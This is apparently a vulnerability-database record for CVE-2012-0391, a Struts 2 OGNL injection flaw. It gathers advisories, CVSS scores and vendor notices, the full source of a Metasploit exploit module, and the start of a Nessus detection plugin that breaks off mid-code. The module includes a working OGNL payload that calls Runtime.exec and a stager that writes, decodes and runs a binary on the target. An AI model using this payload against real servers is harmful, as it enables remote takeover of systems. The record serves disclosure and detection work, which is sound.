Added: 08/02/2012
CVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>)
OSVDB: [78277](<http://www.osvdb.org/78277>)
### Background
Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture.
### Problem
Struts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code.
### Resolution
Upgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later.
### References
<http://struts.apache.org/2.x/docs/version-notes-2311.html>
<https://issues.apache.org/jira/browse/WW-3668>
<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt>
### Limitations
This exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut).
The executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes (').
### Platforms
Windows
{"id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "published": "2012-08-02T00:00:00", "modified": "2012-08-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2012-0391"], "immutableFields": [], "lastseen": "2021-07-29T16:40:11", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-120"]}, {"type": "cisa", "idList": ["CISA:84B5063678E22C88DCF150A265C078F7"]}, {"type": "cve", "idList": ["CVE-2012-0391"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2"]}, {"type": "f5", "idList": ["F5:K20127031"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR"]}, {"type": "nessus", "idList": ["STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "saint", "idList": ["SAINT:46C06C664B1E5C691A77B2FC04327D68", "SAINT:4B122F6299581540A8429BAA06656ACE", "SAINT:7B263B551E3799A3C795713D657E1BD2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0391"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}], "rev": 4}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A"]}, {"type": "cve", "idList": ["CVE-2012-0391"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR"]}, {"type": "nessus", "idList": ["STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "saint", "idList": ["SAINT:46C06C664B1E5C691A77B2FC04327D68"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0391"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}]}, "exploitation": null, "vulnersScore": 0.9}, "_state": {"dependencies": 1647887093, "score": 1659770509}}
{"saint": [{"lastseen": "2022-01-26T11:36:04", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:46C06C664B1E5C691A77B2FC04327D68", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:7B263B551E3799A3C795713D657E1BD2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:41", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-08-02T00:00:00", "id": "SAINT:4B122F6299581540A8429BAA06656ACE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:59", "description": "", "cvss3": {}, "published": "2012-06-05T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.2.1.1 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-06-05T00:00:00", "id": "PACKETSTORM:113272", "href": "https://packetstormsecurity.com/files/113272/Apache-Struts-2.2.1.1-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.1.1. This issue is caused because the \nExceptionDelegator interprets parameter values as OGNL expressions \nduring certain exception handling for mismatched data types of properties, \nwhich allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2012-0391'], \n[ 'OSVDB', '78277'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \n \nuri = String.new(datastore['TARGETURI']) \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win' \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \n \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! \ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"Deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"Delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113272/struts_code_exec_exception_delegator.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:31:26", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets\nparameter values as OGNL expressions during certain exception handling for\nmismatched data types of properties, which allows remote attackers to\nexecute arbitrary Java code via a crafted parameter.\n\n#### Bugs\n\n * <https://issues.apache.org/jira/browse/WW-3668>\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T00:00:00", "id": "UB:CVE-2012-0391", "href": "https://ubuntu.com/security/CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:51:18", "description": "A script injection vulnerability has been reported in Apache Struts 2.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 ConversionErrorInterceptor OGNL Script Injection (CVE-2012-0391)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2012-120", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The ExceptionDelegator component in Apache Struts 2 before 2.2.3.1 contains an improper input validation vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "cisa_kev", "title": "Apache Struts 2 Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2022-01-21T00:00:00", "id": "CISA-KEV-CVE-2012-0391", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:38:20", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "cve", "title": "CVE-2012-0391", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2018-11-23T14:36:00", "cpe": [], "id": "CVE-2012-0391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "d2": [{"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_struts2 \n---|--- \n**CVE**| CVE-2012-0391 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2012-01-08T15:55:00", "title": "DSquare Exploit Pack: D2SEC_STRUTS2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2012-01-08T15:55:00", "id": "D2SEC_STRUTS2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-02-01T00:00:00", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter. ([CVE-2012-0391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>))\n\nImpact\n\nNo F5 products are affected by this vulnerability in default, standard, or recommended configurations. BIG-IP AAM is affected by this vulnerability only if the Apache Struts configuration has been deliberately configured to enable Development Mode (devMode). devMode is disabled by default on BIG-IP AAM. BIG-IP AAM 16.0.0 and later are not vulnerable, regardless of the Apache Struts configuration.\n", "cvss3": {}, "published": "2020-12-11T21:24:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2012-0391", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-12-11T21:24:00", "id": "F5:K20127031", "href": "https://support.f5.com/csp/article/K20127031", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T15:49:06", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to an error in the way that the ExceptionDelegator component handles mismatched data types, an unauthenticated, remote attacker can execute arbitrary commands on the remote host by sending a specially crafted request order. This flaw is due to the ExceptionDelegator interpreting parameter values as OGNL expressions when there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-08-07T00:00:00", "type": "nessus", "title": "Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/69240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69240);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0391\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/21\");\n\n script_name(english:\"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to an error in the way that the ExceptionDelegator\ncomponent handles mismatched data types, an unauthenticated, remote\nattacker can execute arbitrary commands on the remote host by sending\na specially crafted request order. This flaw is due to the\nExceptionDelegator interpreting parameter values as OGNL expressions\nwhen there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?828dc6d2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-008.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0391\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"D2ExploitPack\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if 